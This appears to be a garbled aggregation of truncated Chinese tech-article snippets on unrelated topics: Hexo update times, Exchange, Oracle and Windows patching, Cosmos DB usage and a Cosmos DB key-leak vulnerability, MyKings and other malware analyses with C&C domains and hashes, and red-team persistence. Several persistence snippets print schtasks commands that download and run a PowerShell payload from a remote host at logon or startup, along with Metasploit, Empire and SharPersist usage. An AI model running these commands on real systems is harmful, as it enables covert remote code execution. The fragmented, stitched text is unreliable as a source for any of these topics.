引言 使用 CI ( 例如 GitHub Actions ) 自动部署 Hexo 会导致所有文章 更新于 时间统一变成 GitHub Actions 生成部署的时间, 有3中解决方法: 给每篇文章手动添加...本文 利用 powershell 一键更新 updated, 其实也是利用的 git log 主要是考虑到 文件属性的修改时间 不便查看,以及当换电脑时, 重新从 git 仓库 clone 下来的文件...但每次手动维护更新时间比较麻烦,于是编写 powershell 脚本 来达到自动更新 updated.ps1 在 Hexo 根目录 保存并执行此脚本即可 $fileEncoding = "UTF8";...| 经验摘录 PowerShell 数组(Array)_公众号:SQLServer-CSDN博客_powershell 数组 hexo自动更新文章修改时间 | Black Flies PowerShell..._33785972的博客-CSDN博客 使用PowerShell读取文件数据_culuo4781的博客-CSDN博客 powershell字符串操作 - 一个有故事的devops - 博客园 本文作者:
二、样本分析 mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。...where ExecutablePath=’c:\windows\java\java.exe’ call Terminate 3、安装计划任务”Mysa”、”Mysa2”,在每次系统启动时执行命令,使用账号...Mysa1” /F SCHTASKS /Delete /TN “my1” /F 6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell...8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序: ?...2.2自更新 Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。
下图这种情况,要先关闭powershell管理工具。 ?...server 2008 R2操作系统的补丁更新到了2015年。...前端CASHUB更新完成后,再更新后端的MBX。 ? 升级完成。 ? 检查服务器版本。 ? 14.2版本。...通过exchange powershell查看升级后的版本号。 ?...id=45225 在补丁下载链接里面详细说明了安装RU时需要的先决条件和系统条件要求,可以自行查看 也可以通过WSUS去更新。 下面是安装RU的步骤。安装之前也会先checking system。
不建议再使用2008R2,因为安装不了新补丁2008R2微软已于2020年1月14日下掉,生命周期说明见微软官网文档:https://docs.microsoft.com/en-us/lifecycle.../products/windows-server-2008-r2图片.png扩展安全更新 (ESU) 只提供给购买了延保服务的用户,参考https://cloud.tencent.com/developer.../article/1898118不建议再使用2008R2,我自己使用2008R2,没啥特别的技巧:①安装360安全卫士、360杀毒、火绒②ESU除外的能打的补丁全部打齐③修改默认远程端口号并在安全组放行新的远程端口号...system /rl highest /SC DAILY /MO 1 /TN restart_rdp_service /TR "powershell.exe -c '& {restart-service...system /rl highest /SC DAILY /MO 1 /TN restart_rdp_service /TR "powershell.exe -c '& {restart-service
环境信息如下所示: 操作系统 架构 已安装的反病毒软件 计算机名称 操作系统构建版本 .NET 信息 PowerShell 信息 Python 信息(安装路径、版本等) 存储驱动器信息 环境变量 网络接口...WoodySharpExecutor 支持恶意软件运行从 C&C 服务器接收的 .NET 代码, WoodyPowerSession 支持恶意软件执行从 C&C 服务器接收的 PowerShell 命令和脚本...base64 字符串数组,为攻击者提供对执行更精细的控制,如不将输出回传 PSSC:接收 base64 编码的 PowerShell 命令并执行 PSSS:接收 base64 编码的 PowerShell...b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e...[.]ru 194.36.189.179 microsoft-telemetry[.]ru oakrussia[.]ru garmandesar.duckdns[.]org:444/uoqiuwef.html
Azure Cosmos DB 是 Microsoft 提供的全球分布式多模型数据库服务。Cosmos DB是一种NoSql数据库,但是它兼容多种API。...保证第 99 个百分位为低延迟(全球范围内) 使用 Cosmos DB,可以生成响应迅速、具全球规模的应用程序。...Cosmos DB 自动为所有数据编制索引,并可快速提供查询服务。 以上内容摘自Azure Cosmos文档 创建Cosmos DB资源 在portal控制面板找到Cosmos点击创建。...使用Mongodb API操作数据库 因为Cosmos支持mongodb协议,所以我们操作Cosmos的时候直接把Cosmos当做mongodb来使用就可以。...下面代码演示了如何使用nodejs的mongodb驱动来操作Cosmos DB。
只有方法一可以搞定 优先方法一,方法二和三不行的时候,只有方法一可以搞定 方法二、命令卸载,参考https://knowledge.broadcom.com/external/article/151297 ①PowerShell...Open a PowerShell Window as Administrator Run the following command: (Get-WmiObject -Class Win32_Product...后来我反思,跟SEP更新源在大陆外有关,如果搞个大陆外的机器安装SEP,更新应该是很快的,然后做个镜像跨地域复制到大陆内的地区)。..._Win64-bit_Client_EN.exe 再后来,我又找到了RU7的安装文件,RU7毕竟毕竟新,可更新的内容少,相对来说,更容易更新成功。...失败率太高了,不建议用,例如总是卡在这个更新失败上,因为更新失败→ 病毒和间谍软件定义丢失或已损坏 Symantec Endpoint Protection (SEP) 的系统要求: https://techdocs.broadcom.com
在 Windows 系统上,可以使用计划任务来定时执行某些操作,方便用户对系统的使用和管理,红队成员也可以利用这个特性来对系统进行持久化的控制。...'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onlogon /ru...'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru...也可以使用 Powershell 来创建计划任务: $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\pentestlab.exe...Empire 使用下面的命令创建每天凌晨 03:22 执行基于 PowerShell 的 payload,任务名称为 "WindowsUpdate" 用来迷惑用户: usemodule persistence
可口可乐、埃克森美和思杰等微软客户使用Cosmos DB近乎实时地管理来自世界各地的海量数据。...确切地说,Cosmos DB功能中的一系列缺陷造成了安全漏洞,允许任何用户可以下载、删除或操纵大量的商业数据库,以及对Cosmos DB底层架构执行读取/写入访问。...第二部分:访问Cosmos DB中的客户数据 接下来,在收集Cosmos DB秘密信息后,我们表明攻击者可以利用这些密钥,对存储在受影响的Cosmos DB帐户中的所有数据进行全面的管理员级访问。...这些是长期存在的秘密信息;万一泄露,攻击者可以使用该密钥来泄露数据库内容。今天,微软已通知超过30%的Cosmos DB客户:他们需要手动轮换访问密钥以缓解这个风险。...每个使用notebook功能或在2021年2月之后创建的Cosmos DB帐户都可能已泄露。作为一项防范措施,我们敦促每个Cosmos DB客户都应采取措施来保护自己的信息。
环境:Oracle RAC(GI 19.3 + DB 19.3) 本文应用补丁信息, 19.16 RU: p34130714_190000_Linux-x86-64.zip 本文主要演示使用opatch...1.更新OPatch版本 2.使用opatch auto应用补丁 3.应用补丁后操作 1.更新OPatch版本 在所有节点的GI HOME和DB HOME下,都更新为符合应用补丁需求的OPatch版本...根据readme中描述,对于GI HOME和DB HOME都不共享的情况下,使用root用户在每个节点执行opatch auto的具体命令即可实现自动应用补丁。...先确认补丁包的解压目录(各节点保持一致,方便操作): $ cd /u01/media/ru $ unzip /u01/media/p34130714_190000_Linux-x86-64.zip 然后使用...比如,在安装DB软件时同时指定RU: [oracle@bogon db_1]$ .
如果在重新封装更新用户表之前,已经更新了数据表,在数据库中已经有了django相关的依赖表,就会报错: django.db.migrations.exceptions.InconsistentMigrationHistory
原文:Azure Tips and Tricks 翻译:汪宇杰 在Cosmos DB中使用数据迁移工具 有一项重复的任务是将数据从一种数据库格式迁移到另一种数据库格式。...我最近使用Cosmos DB作为数据库来存储Ignite大会发出的所有推文。然而一旦获得了数据并且不再使用Cosmos DB进行该操作,我就需要将数据转储到本地文件中保存并节省开销。...工具 下载并安装 Azure DocumentDB Data Migration Tool https://aka.ms/csdmtool 开工 首先确保已创建要迁移的Cosmos DB数据库和集合。...在 Cosmos DB 管理页面中打开 Keys,并复制 Primary Connection String ? 将数据库名称附加到字符串的末尾。...现在,我们有了本地JSON文件可以随心所欲使用!碉堡了!
例如使用下面的命令就可以指定在每次系统登录时,操作系统会自动去下载并执行一个基于PowerShell的Payload。...IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onlogon /ru...图*-* 用户管理员注销获取的Meterpreter 我们也可以使用PowerShell创建计划任务,这些任务将在用户登录时或在特定的时间和日期执行。...图*-* 使用SharPersist列出的Backdoor 计划任务列表 Empire Empire中包含两个可以用来实现计划任务的模块(区别在于使用时权限不同),下面给出的命令可以通过PowerShell...图*-* 使用Empire列出的Backdoor 计划任务列表 PowerShell的elevated模块提供了一个用户登录时执行计划任务的选项。
本文演示关于19c RU补丁常见报错问题的分析处理: 1.查看补丁应用失败的原因 2.问题解决后可继续应用补丁 3.发现DB的RU补丁未更新 4.opatchauto应用DB补丁报错解决 1.查看补丁应用失败的原因...补丁应用失败有详细日志记录原因; 故意使用oracle用户解压补丁,然后测试是否可以opatchauto apply应用: [root@db01rac2 media]# /u01/app/19.3.0...2.问题解决后可继续应用补丁 解决问题后可以使用opatchauto resume继续尝试: 重新使用grid用户解压RU补丁包,然后使用root用户尝试resume补丁应用: /u01/app/19.3.0...media]# 3.发现DB的RU补丁未更新 检查补丁应用情况发现DB的补丁未更新 查看RU补丁发现DB的补丁未应用,这是因为DB没有安装数据库,其实在11g时就有这个问题: [root@db01rac2...那么在当前暂不需要安装数据库的场景,如何让DB补丁也更新呢? 解决方案两种: 一是应用补丁之前先建一个临时测试库,补丁应用时就会自动应用GI和DB软件的补丁,最后再删掉临时测试库就好。
这被认为是一种旧的持久性技术,但是它仍然可以在red team场景中使用,并且由各种开源工具支持。Metasploit 的web_delivery模块可用于托管和生成各种格式的有效载荷。...命令提示符--持久性计划任务 当用户再次使用系统登录时,将执行有效负载,并打开meterpreter会话。 ?...计划任务注销– Meterpreter 或者,可以使用PowerShell创建计划任务,这些任务将在用户登录时或在特定时间和日期执行。...SharPersist –列表计划任务 或者,仅使用“ list ”选项而不指定名称将枚举系统上所有现有的计划任务。 SharPersist -t schtask -m list ?...在这两个模块中,都将使用注册表以Base64编码格式存储有效负载,但是以不同的注册表项存储。
图数据库的主要优点: 更好,更快速的查询和分析; 更简单和更自然的数据建模; 同时支持实时更新和查询; 数据结构的灵活性。...从图中可以获取到的信息有: 无论是在 native 图数据库 还是复合型图数据库,Neo4j 均取得了一枝独秀的成绩; 微软 Azure 的 Cosmos DB 的增长速度非常非常非常迅猛; ArangoDB...Microsoft Azure Cosmos DB Cosmos DB是微软2010年立项,经过7年研发,于2017年5月正式发布的云数据库服务,该数据库服务支持图数据、列存储、键值存储和文档数据库等多种数据模型...而微软则恰好相反, Cosmos DB采取一刀切的方式,号称可以适用一切通用型数据库。 微软的Cosmos DB的天才之处在于开发人员可能希望在混合持久化方面鱼与熊掌兼得。...正如InfoWorld的SerdarYegulalp所写的:“在拥有Cosmos DB的情况下,微软在同一个数据库中提供了多重持久化模型,因此模型的选择可以是工作负载的功能而不是产品的功能”。
微软Build 2017发布的Cosmos数据库比较有意思,同时支持5个级别一致性。 ?...最常见的两种模式是强制一致性(Strong consistency)与最终一致性(EventuallyConsistency),但Azure Cosmos DB额外提供了介于上述两者之间的 有边界一致性...Cosmos DB在许多方面借鉴了DocumentDB,这不足为奇。其中一个方面就是拥有可调整的一致性模型(consistency model)。...比如说,对于Cosmos DB(以及之前的DocumentDB)而言,那意味着,你可以选择这种一致性模型:允许读取操作比写入操作只延后某一段时间(毫秒级),也可以选择这种一致性模型:专注于为某种特定的客户会话提供一致性...回滚实际上是一个比较高层抽象的概念,大多数DB在实现事务时,是在事务操作的数据快照上进行的(比如,MVCC),并不修改实际的数据,如果有错并不会提交,所以很自然的支持回滚。
0079nlvZly4g5y08a5rhxj30u00esmzx.jpg 某一天,当你检查服务器,发现很多服务器的CPU使用率特别高,且使用进程为Powershell.exe时,那么基本可以判定,您的服务器中了...进程的CPU使用率非常高。...0079nlvZly4g65waj5ru9j30dq0170sk.jpg 2.删除攻击类 通过wbemtest打开WMI检查器 0079nlvZly4g65waj72i8j30ay068dfn.jpg...补丁要求、防病毒、运维管理要求如何配置等) 定义服务器运维规范,安全要求,以及安全检查机制 建立服务器配置管理机制,首先针对操作系统进行配置管理 客户端: 建立客户端系统准入机制,如没有进行补丁更新...、没有安装防病毒的客户端无法访问服务器区网络 定义客户端补丁更新策略、防病毒更新策略等安全要求 建立客户端统一的桌管平台,让客户端的机器能够统一的进行管理 2.
w32time -EA 0}}) 这句命令在powershell中可以,在cmd中也可以 powershell.exe -Command "if((get-service w32time).status...-ne 'Running'){start-service w32time -EA 0}" 这句命令在powershell中可以,在cmd中也可以 powershell -command "& ({if...{start-service w32time -EA 0}'" #像上面2句创建的文件是ANSI编码,且第一行有日期时间信息 schtasks.exe /create /tn "w32time" /ru...type nul>c:\w32time.ps1,本来用cmd.exe /c echo %date% %time%>c:\w32time.ps1创建的文件是ANSI编码,第一行有日期时间,需要注释或清空,结果使用...EA 0};if((get-service w32time).status -eq ''Running''){exit};}'" schtasks.exe /create /tn "w32time" /ru
schtasks /create /tn "lock" /tr "rundll32.exe user32.dll, LockWorkStation" /sc once /st 19:24 /S \\target /RU...administrator /u administrator /p "password" 如果想要锁定其他⽤⼾,可以修改 /RU 参数为指定⽤⼾。...如果要求交互式任务,则使用 schtasks.exe 实用程序(使用 "schtasks /?" 命令获取详细信 息)。 2.2MSF 1....利⽤powershell插件,执⾏powershell脚本也可以: 将powershell脚本保存在MSF本地,利⽤ powershell_import 导⼊,使⽤ powershell_execute...利⽤powershell: beacon> powershell-import /home/kali/Desktop/lock.ps1 beacon> powershell Lock-WorkStation